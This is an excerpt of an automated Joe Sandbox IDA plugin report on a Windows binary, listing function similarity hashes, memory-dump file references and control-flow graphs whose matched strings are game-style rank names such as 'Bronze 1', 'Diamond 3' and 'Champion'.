                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Bronze 1
                                                                                                                                                                                                      • API String ID: 3063020102-604619507
                                                                                                                                                                                                      • Opcode ID: 1ab3123b9978825f1b010b984fe8543613a91dee6e313c613bcbd0b1c06a16e8
                                                                                                                                                                                                      • Instruction ID: fefdd0c385047ed3dd336a5a00381ea5843aa75d4ce019feda83862e64220774
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ab3123b9978825f1b010b984fe8543613a91dee6e313c613bcbd0b1c06a16e8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5782E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Silver 2
                                                                                                                                                                                                      • API String ID: 3063020102-2950641177
                                                                                                                                                                                                      • Opcode ID: 70dc03bb5091e3dc0444ae30c3651d8ccac21bafac33811686ee661c6c440c35
                                                                                                                                                                                                      • Instruction ID: 0092bf1ab1724d2f85d750da7ec4a7ad5f892d7e6abbdfc122ab5584a9601844
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70dc03bb5091e3dc0444ae30c3651d8ccac21bafac33811686ee661c6c440c35
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 2326 7ff68b4c2667-7ff68b4c283f call 7ff68b4c7ef0 call 7ff68b482c40 2335 7ff68b4c2845-7ff68b4c284c 2326->2335 2336 7ff68b4c28e6-7ff68b4c28fb 2326->2336 2337 7ff68b4c2850-7ff68b4c2858 2335->2337 2338 7ff68b4c292e-7ff68b4c2964 call 7ff68b4be8c0 2336->2338 2339 7ff68b4c28fd-7ff68b4c290b 2336->2339 2337->2337 2340 7ff68b4c285a-7ff68b4c2860 2337->2340 2348 7ff68b4c29f6-7ff68b4c2a03 2338->2348 2349 7ff68b4c296a-7ff68b4c2987 call 7ff68b4b2530 2338->2349 2341 7ff68b4c2926-7ff68b4c2929 call 7ff68b4cad80 2339->2341 2342 7ff68b4c290d-7ff68b4c2920 2339->2342 2340->2336 2345 7ff68b4c2866-7ff68b4c28df call 7ff68b4a1a40 2340->2345 2341->2338 2342->2341 2346 7ff68b4c3557-7ff68b4c355d _invalid_parameter_noinfo_noreturn 2342->2346 2345->2336 2350 7ff68b4c355e-7ff68b4c3564 _invalid_parameter_noinfo_noreturn 2346->2350 2355 7ff68b4c2a09-7ff68b4c2a1d 2348->2355 2356 7ff68b4c2e4b-7ff68b4c2f02 call 7ff68b482c40 call 7ff68b49e250 2348->2356 2362 7ff68b4c2989 2349->2362 2363 7ff68b4c298c-7ff68b4c29a7 call 7ff68b4c7e40 2349->2363 2353 7ff68b4c3565-7ff68b4c356b _invalid_parameter_noinfo_noreturn 2350->2353 2358 7ff68b4c356c-7ff68b4c3572 _invalid_parameter_noinfo_noreturn 2353->2358 2361 7ff68b4c2a20-7ff68b4c2a48 2355->2361 2387 7ff68b4c2f08-7ff68b4c311c sinf cosf atan2f sinf cosf sinf cosf sinf cosf sinf cosf call 7ff68b4c8470 * 2 call 7ff68b482c40 2356->2387 2388 7ff68b4c337d-7ff68b4c33ea pow * 2 2356->2388 2364 7ff68b4c3573-7ff68b4c3579 _invalid_parameter_noinfo_noreturn 2358->2364 2361->2361 2366 7ff68b4c2a4a-7ff68b4c2be8 call 7ff68b4c9c30 memcpy * 3 call 7ff68b4c7e40 2361->2366 2362->2363 2376 7ff68b4c29a9-7ff68b4c29bd 2363->2376 2377 7ff68b4c29dd-7ff68b4c29ef 2363->2377 2367 7ff68b4c357a-7ff68b4c3580 _invalid_parameter_noinfo_noreturn 2364->2367 2432 7ff68b4c2c1e-7ff68b4c2c3f 2366->2432 2433 7ff68b4c2bea-7ff68b4c2bfe 2366->2433 2371 7ff68b4c3581-7ff68b4c3587 _invalid_parameter_noinfo_noreturn 2367->2371 2375 7ff68b4c3588-7ff68b4c358e _invalid_parameter_noinfo_noreturn 2371->2375 2380 7ff68b4c358f-7ff68b4c359f call 7ff68b4cad80 2375->2380 2381 7ff68b4c29bf-7ff68b4c29d2 2376->2381 2382 7ff68b4c29d8 call 7ff68b4cad80 2376->2382 2377->2348 2395 7ff68b4c35a6-7ff68b4c35b0 2380->2395 2381->2350 2381->2382 2382->2377 2436 7ff68b4c3122-7ff68b4c3132 2387->2436 2437 7ff68b4c3258-7ff68b4c32dc call 7ff68b4b1200 call 7ff68b4c7830 call 7ff68b4b11a0 2387->2437 2401 7ff68b4c3410-7ff68b4c341b 2388->2401 2402 7ff68b4c33ec-7ff68b4c33fb 2388->2402 2399 7ff68b4c35b2-7ff68b4c35ca 2395->2399 2400 7ff68b4c35ed-7ff68b4c3654 call 7ff68b4ca930 2395->2400 2408 7ff68b4c35e8 call 7ff68b4cad80 2399->2408 2409 7ff68b4c35cc-7ff68b4c35df 2399->2409 2403 7ff68b4c3451-7ff68b4c3475 2401->2403 2404 7ff68b4c341d-7ff68b4c3431 2401->2404 2402->2401 2410 7ff68b4c33fd-7ff68b4c3409 2402->2410 2416 7ff68b4c3477-7ff68b4c348b 2403->2416 2417 7ff68b4c34ab-7ff68b4c34ea 2403->2417 2412 7ff68b4c3433-7ff68b4c3446 2404->2412 2413 7ff68b4c344c call 7ff68b4cad80 2404->2413 2408->2400 2409->2408 2419 7ff68b4c35e1-7ff68b4c35e7 _invalid_parameter_noinfo_noreturn 2409->2419 2410->2401 2412->2371 2412->2413 2413->2403 2422 7ff68b4c34a6 call 7ff68b4cad80 2416->2422 2423 7ff68b4c348d-7ff68b4c34a0 2416->2423 2417->2395 2431 7ff68b4c34f0-7ff68b4c3504 2417->2431 2419->2408 2422->2417 2423->2375 2423->2422 2431->2380 2438 7ff68b4c350a-7ff68b4c351d 2431->2438 2434 7ff68b4c2c41-7ff68b4c2c52 2432->2434 2435 7ff68b4c2c72-7ff68b4c2d60 call 7ff68b482c40 2432->2435 2439 7ff68b4c2c00-7ff68b4c2c13 2433->2439 2440 7ff68b4c2c19 call 7ff68b4cad80 2433->2440 2442 7ff68b4c2c54-7ff68b4c2c67 2434->2442 2443 7ff68b4c2c6d call 7ff68b4cad80 2434->2443 2471 7ff68b4c2d66-7ff68b4c2d6d 2435->2471 2472 7ff68b4c2dfb-7ff68b4c2dff 2435->2472 2445 7ff68b4c3134-7ff68b4c3155 2436->2445 2446 7ff68b4c315d-7ff68b4c317e 2436->2446 2480 7ff68b4c32de-7ff68b4c3343 call 7ff68b4a1820 2437->2480 2481 7ff68b4c334a-7ff68b4c334e 2437->2481 2438->2380 2448 7ff68b4c351f-7ff68b4c3556 _invalid_parameter_noinfo_noreturn * 8 2438->2448 2439->2353 2439->2440 2440->2432 2442->2358 2442->2443 2443->2435 2465 7ff68b4c3158 call 7ff68b493280 2445->2465 2452 7ff68b4c3180-7ff68b4c31a1 2446->2452 2453 7ff68b4c31a9-7ff68b4c31ca 2446->2453 2448->2346 2467 7ff68b4c31a4 call 7ff68b493280 2452->2467 2455 7ff68b4c31f5-7ff68b4c323a call 7ff68b49c550 2453->2455 2456 7ff68b4c31cc-7ff68b4c31ed 2453->2456 2477 7ff68b4c3255 2455->2477 2478 7ff68b4c323c-7ff68b4c324d 2455->2478 2476 7ff68b4c31f0 call 7ff68b493280 2456->2476 2465->2446 2467->2453 2479 7ff68b4c2d70-7ff68b4c2d78 2471->2479 2474 7ff68b4c2e01-7ff68b4c2e0f 2472->2474 2475 7ff68b4c2e32-7ff68b4c2e44 2472->2475 2482 7ff68b4c2e11-7ff68b4c2e24 2474->2482 2483 7ff68b4c2e2a-7ff68b4c2e2d call 7ff68b4cad80 2474->2483 2475->2356 2476->2455 2477->2437 2484 7ff68b4c3250 call 7ff68b493280 2478->2484 2479->2479 2485 7ff68b4c2d7a-7ff68b4c2d80 2479->2485 2480->2481 2481->2388 2488 7ff68b4c3350-7ff68b4c335d 2481->2488 2482->2364 2482->2483 2483->2475 2484->2477 2485->2472 2489 7ff68b4c2d82-7ff68b4c2df4 call 7ff68b4a1a40 2485->2489 2491 7ff68b4c335f-7ff68b4c3372 2488->2491 2492 7ff68b4c3378 call 7ff68b4cad80 2488->2492 2489->2472 2491->2367 2491->2492 2492->2388
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Silver 1
                                                                                                                                                                                                      • API String ID: 3063020102-920020899
                                                                                                                                                                                                      • Opcode ID: dd5a9e45530b6f9f866709f237e15754142077fe6625e20070edeaa5752db1d8
                                                                                                                                                                                                      • Instruction ID: 089b0def447d6d64a0a3de25a373d3d525bace8a94507698eb6b3cf8bd32f6b5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd5a9e45530b6f9f866709f237e15754142077fe6625e20070edeaa5752db1d8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 2156 7ff68b4c265b-7ff68b4c283f call 7ff68b4c7ef0 call 7ff68b482c40 2165 7ff68b4c2845-7ff68b4c284c 2156->2165 2166 7ff68b4c28e6-7ff68b4c28fb 2156->2166 2167 7ff68b4c2850-7ff68b4c2858 2165->2167 2168 7ff68b4c292e-7ff68b4c2964 call 7ff68b4be8c0 2166->2168 2169 7ff68b4c28fd-7ff68b4c290b 2166->2169 2167->2167 2170 7ff68b4c285a-7ff68b4c2860 2167->2170 2178 7ff68b4c29f6-7ff68b4c2a03 2168->2178 2179 7ff68b4c296a-7ff68b4c2987 call 7ff68b4b2530 2168->2179 2171 7ff68b4c2926-7ff68b4c2929 call 7ff68b4cad80 2169->2171 2172 7ff68b4c290d-7ff68b4c2920 2169->2172 2170->2166 2175 7ff68b4c2866-7ff68b4c28df call 7ff68b4a1a40 2170->2175 2171->2168 2172->2171 2176 7ff68b4c3557-7ff68b4c355d _invalid_parameter_noinfo_noreturn 2172->2176 2175->2166 2180 7ff68b4c355e-7ff68b4c3564 _invalid_parameter_noinfo_noreturn 2176->2180 2185 7ff68b4c2a09-7ff68b4c2a1d 2178->2185 2186 7ff68b4c2e4b-7ff68b4c2f02 call 7ff68b482c40 call 7ff68b49e250 2178->2186 2192 7ff68b4c2989 2179->2192 2193 7ff68b4c298c-7ff68b4c29a7 call 7ff68b4c7e40 2179->2193 2183 7ff68b4c3565-7ff68b4c356b _invalid_parameter_noinfo_noreturn 2180->2183 2188 7ff68b4c356c-7ff68b4c3572 _invalid_parameter_noinfo_noreturn 2183->2188 2191 7ff68b4c2a20-7ff68b4c2a48 2185->2191 2217 7ff68b4c2f08-7ff68b4c311c sinf cosf atan2f sinf cosf sinf cosf sinf cosf sinf cosf call 7ff68b4c8470 * 2 call 7ff68b482c40 2186->2217 2218 7ff68b4c337d-7ff68b4c33ea pow * 2 2186->2218 2194 7ff68b4c3573-7ff68b4c3579 _invalid_parameter_noinfo_noreturn 2188->2194 2191->2191 2196 7ff68b4c2a4a-7ff68b4c2be8 call 7ff68b4c9c30 memcpy * 3 call 7ff68b4c7e40 2191->2196 2192->2193 2206 7ff68b4c29a9-7ff68b4c29bd 2193->2206 2207 7ff68b4c29dd-7ff68b4c29ef 2193->2207 2197 7ff68b4c357a-7ff68b4c3580 _invalid_parameter_noinfo_noreturn 2194->2197 2262 7ff68b4c2c1e-7ff68b4c2c3f 2196->2262 2263 7ff68b4c2bea-7ff68b4c2bfe 2196->2263 2201 7ff68b4c3581-7ff68b4c3587 _invalid_parameter_noinfo_noreturn 2197->2201 2205 7ff68b4c3588-7ff68b4c358e _invalid_parameter_noinfo_noreturn 2201->2205 2210 7ff68b4c358f-7ff68b4c359f call 7ff68b4cad80 2205->2210 2211 7ff68b4c29bf-7ff68b4c29d2 2206->2211 2212 7ff68b4c29d8 call 7ff68b4cad80 2206->2212 2207->2178 2225 7ff68b4c35a6-7ff68b4c35b0 2210->2225 2211->2180 2211->2212 2212->2207 2266 7ff68b4c3122-7ff68b4c3132 2217->2266 2267 7ff68b4c3258-7ff68b4c32dc call 7ff68b4b1200 call 7ff68b4c7830 call 7ff68b4b11a0 2217->2267 2231 7ff68b4c3410-7ff68b4c341b 2218->2231 2232 7ff68b4c33ec-7ff68b4c33fb 2218->2232 2229 7ff68b4c35b2-7ff68b4c35ca 2225->2229 2230 7ff68b4c35ed-7ff68b4c3654 call 7ff68b4ca930 2225->2230 2238 7ff68b4c35e8 call 7ff68b4cad80 2229->2238 2239 7ff68b4c35cc-7ff68b4c35df 2229->2239 2233 7ff68b4c3451-7ff68b4c3475 2231->2233 2234 7ff68b4c341d-7ff68b4c3431 2231->2234 2232->2231 2240 7ff68b4c33fd-7ff68b4c3409 2232->2240 2246 7ff68b4c3477-7ff68b4c348b 2233->2246 2247 7ff68b4c34ab-7ff68b4c34ea 2233->2247 2242 7ff68b4c3433-7ff68b4c3446 2234->2242 2243 7ff68b4c344c call 7ff68b4cad80 2234->2243 2238->2230 2239->2238 2249 7ff68b4c35e1-7ff68b4c35e7 _invalid_parameter_noinfo_noreturn 2239->2249 2240->2231 2242->2201 2242->2243 2243->2233 2252 7ff68b4c34a6 call 7ff68b4cad80 2246->2252 2253 7ff68b4c348d-7ff68b4c34a0 2246->2253 2247->2225 2261 7ff68b4c34f0-7ff68b4c3504 2247->2261 2249->2238 2252->2247 2253->2205 2253->2252 2261->2210 2268 7ff68b4c350a-7ff68b4c351d 2261->2268 2264 7ff68b4c2c41-7ff68b4c2c52 2262->2264 2265 7ff68b4c2c72-7ff68b4c2d60 call 7ff68b482c40 2262->2265 2269 7ff68b4c2c00-7ff68b4c2c13 2263->2269 2270 7ff68b4c2c19 call 7ff68b4cad80 2263->2270 2272 7ff68b4c2c54-7ff68b4c2c67 2264->2272 2273 7ff68b4c2c6d call 7ff68b4cad80 2264->2273 2301 7ff68b4c2d66-7ff68b4c2d6d 2265->2301 2302 7ff68b4c2dfb-7ff68b4c2dff 2265->2302 2275 7ff68b4c3134-7ff68b4c3155 2266->2275 2276 7ff68b4c315d-7ff68b4c317e 2266->2276 2310 7ff68b4c32de-7ff68b4c3343 call 7ff68b4a1820 2267->2310 2311 7ff68b4c334a-7ff68b4c334e 2267->2311 2268->2210 2278 7ff68b4c351f-7ff68b4c3556 _invalid_parameter_noinfo_noreturn * 8 2268->2278 2269->2183 2269->2270 2270->2262 2272->2188 2272->2273 2273->2265 2295 7ff68b4c3158 call 7ff68b493280 2275->2295 2282 7ff68b4c3180-7ff68b4c31a1 2276->2282 2283 7ff68b4c31a9-7ff68b4c31ca 2276->2283 2278->2176 2297 7ff68b4c31a4 call 7ff68b493280 2282->2297 2285 7ff68b4c31f5-7ff68b4c323a call 7ff68b49c550 2283->2285 2286 7ff68b4c31cc-7ff68b4c31ed 2283->2286 2307 7ff68b4c3255 2285->2307 2308 7ff68b4c323c-7ff68b4c324d 2285->2308 2306 7ff68b4c31f0 call 7ff68b493280 2286->2306 2295->2276 2297->2283 2309 7ff68b4c2d70-7ff68b4c2d78 2301->2309 2304 7ff68b4c2e01-7ff68b4c2e0f 2302->2304 2305 7ff68b4c2e32-7ff68b4c2e44 2302->2305 2312 7ff68b4c2e11-7ff68b4c2e24 2304->2312 2313 7ff68b4c2e2a-7ff68b4c2e2d call 7ff68b4cad80 2304->2313 2305->2186 2306->2285 2307->2267 2314 7ff68b4c3250 call 7ff68b493280 2308->2314 2309->2309 2315 7ff68b4c2d7a-7ff68b4c2d80 2309->2315 2310->2311 2311->2218 2318 7ff68b4c3350-7ff68b4c335d 2311->2318 2312->2194 2312->2313 2313->2305 2314->2307 2315->2302 2319 7ff68b4c2d82-7ff68b4c2df4 call 7ff68b4a1a40 2315->2319 2321 7ff68b4c335f-7ff68b4c3372 2318->2321 2322 7ff68b4c3378 call 7ff68b4cad80 2318->2322 2319->2302 2321->2197 2321->2322 2322->2218
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Bronze 3
                                                                                                                                                                                                      • API String ID: 3063020102-3389498335
                                                                                                                                                                                                      • Opcode ID: 8c7902f809fc18538573d45da2e0e89bcdf39c4da26b8e49d16b09953188c13a
                                                                                                                                                                                                      • Instruction ID: 45fa77d0e7c4b4d388207036953654b8b627066f6a0c345eb6ddc7f8e234c0a7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c7902f809fc18538573d45da2e0e89bcdf39c4da26b8e49d16b09953188c13a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6782E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Diamond 3
                                                                                                                                                                                                      • API String ID: 3063020102-2523521028
                                                                                                                                                                                                      • Opcode ID: c0f8798171c3598e572867e051071c27df97a586ba737f48579320c3c8771d70
                                                                                                                                                                                                      • Instruction ID: 97f89ad3bddcb1a7e275265bb1b5347f160c14c1a2708fb7eb4b2041ac12967b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0f8798171c3598e572867e051071c27df97a586ba737f48579320c3c8771d70
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5782E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Diamond 2
                                                                                                                                                                                                      • API String ID: 3063020102-3782135954
                                                                                                                                                                                                      • Opcode ID: cc0daa8317402374e0d7fc753a8de104d8d3d9cc7654f14c34212ace3d465571
                                                                                                                                                                                                      • Instruction ID: 1bea3b42e01dd70de905890a918ca8b11f89db7c987606532b2c0903f2a3bb0f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc0daa8317402374e0d7fc753a8de104d8d3d9cc7654f14c34212ace3d465571
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0482E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Unreal
                                                                                                                                                                                                      • API String ID: 3063020102-2085349250
                                                                                                                                                                                                      • Opcode ID: 3a0f16b0ce6fb060f4bc70d45fafc54e40f47c3bfc18f45a5f7d8be7d00c8fc7
                                                                                                                                                                                                      • Instruction ID: 388930aec8bcc452bbcbe504e69d246c0ba7da6f1b93ea6fe92599f4f8d09a36
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a0f16b0ce6fb060f4bc70d45fafc54e40f47c3bfc18f45a5f7d8be7d00c8fc7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7782E022A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Champion
                                                                                                                                                                                                      • API String ID: 3063020102-3157597410
                                                                                                                                                                                                      • Opcode ID: 144ded6759e24a764fb614f588dbe56c86c1a34ce66523a0084d2929ab5e4519
                                                                                                                                                                                                      • Instruction ID: 5cddca6c7f4f0037cb56e59f6a41a1052be3332f0fe6c6f15e7105372178e9ba
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 144ded6759e24a764fb614f588dbe56c86c1a34ce66523a0084d2929ab5e4519
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
